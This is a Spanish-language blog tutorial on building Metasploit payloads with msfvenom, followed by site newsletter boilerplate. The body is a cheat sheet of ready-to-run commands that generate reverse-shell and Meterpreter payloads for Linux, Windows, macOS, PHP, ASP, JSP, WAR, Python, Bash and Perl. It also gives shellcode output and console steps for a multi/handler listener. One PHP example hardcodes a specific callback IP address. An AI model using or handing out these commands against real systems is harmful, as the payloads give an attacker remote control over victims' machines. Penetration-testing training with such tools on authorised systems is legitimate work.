NeosLab.com
Metasploit

Cómo Crear un Payload Metasploit

A menudo, una de las habilidades más útiles y subestimadas por el principiante de Metasploit es el módulo msfpayload. Se pueden crear múltiples payloads con este módulo y ayudar a que pueda darle un shell en casi cualquier situación. Para cada uno de estos payloads, puede acceder a msfconsole y seleccionar exploit/multi/ handler. Ejecute ‘establecer payloads’ para los payloads relevantes utilizados y configurar todas las opciones necesarias (LHOST, LPORT, etc.).

Para los ejemplos a continuación es bastante explicativo, pero LHOST debe completarse con su dirección IP (LAN IP si ataca dentro de la red, WAN IP si ataca a través de Internet), y LPORT debe ser el puerto que desea volver a conectar.

LISTA DE PAYLOADS DISPONIBLE
$ msfvenom -l

PAYLOADS BINARIE

2.1 Linux

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f elf > shell.elf

2.2 Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f exe > shell.exe

2.3 Mac

$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f macho > shell.macho
PAYLOADS WEB

3.1 PHP

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=52.15.194.28 LPORT=12663 -e php/base64 R > shell.php

Como el archivo se ha codificado con base64, no olvide abrirlo con su editor de texto favorito y agregar “<?php” en la parte superior y “?>php” al final.

3.2 ASP

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f asp > shell.asp

3.3 JSP

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.jsp

3.4 WAR

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f war > shell.war
SCRIPTING PAYLOADS

4.1 Python

$ msfvenom -p cmd/unix/reverse_python LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.py

4.2 Bash

$ msfvenom -p cmd/unix/reverse_bash LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.sh

4.3 Perl

$ msfvenom -p cmd/unix/reverse_perl LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f raw > shell.pl
SHELLCODE PAYLOADS

Para todos los shellcode, consulte ‘msfvenom -help-formats’ para obtener información sobre los parámetros válidos. Msfvenom dará salida al código que se puede cortar y pegar en este idioma para sus exploits.

5.1 Shellcode basado en Linux

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"

5.2 Shellcode basado en Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"

5.3 Shellcode basado en Mac

$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -f "LANGUAGE"
CREAR CONTROLADORES

Los controladores de Metasploit pueden ser excelentes para configurar rápidamente Metasploit para que esté en condiciones de recibir sus Shell entrantes. Los controladores deben estar en el siguiente formato.

$ msfconsole
$ msf > use exploit/multi/handler
$ msf exploit(multi/handler) > set LHOST 0.0.0.0
$ msf exploit(multi/handler) > set PAYLOAD 
$ msf exploit(multi/handler) > set LHOST 
$ msf exploit(multi/handler) > set LPORT 
$ msf exploit(multi/handler) > set ExitOnSession false
$ msf exploit(multi/handler) > exploit -j -z
USAR PAYLOADS PERZONALIZADO

Metasploit te permite generar payloads y usarlos durante un ataque. Para usar esta función, simplemente genere su Payload antes de ejecutar su ataque y una vez que haya terminado, use “payload/generic/custom” para especificar el payload a usar.

$ msfconsole
$ msf > use  payload/generic/custom
$ msf payload(custom) > show options
$ ...show and set options...
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use

Artículos Relacionados

Como Usar Metasploit para Principiantes

neoslab

Cómo instalar Metasploit Framework en Ubuntu 16.04 LTS y Debian 7

neoslab

Deja un comentario

* By using this form you agree with the storage and handling of your data by this website.

Hey Wait!
Did you know ? You can build your Cyber security or IT career for FREE !
Make yourself happy, join our 8,000 members and receive FREE every day our latest tutorials and webinars to your mailbox!
Yes, Send it Over!
No Thanks!
close-link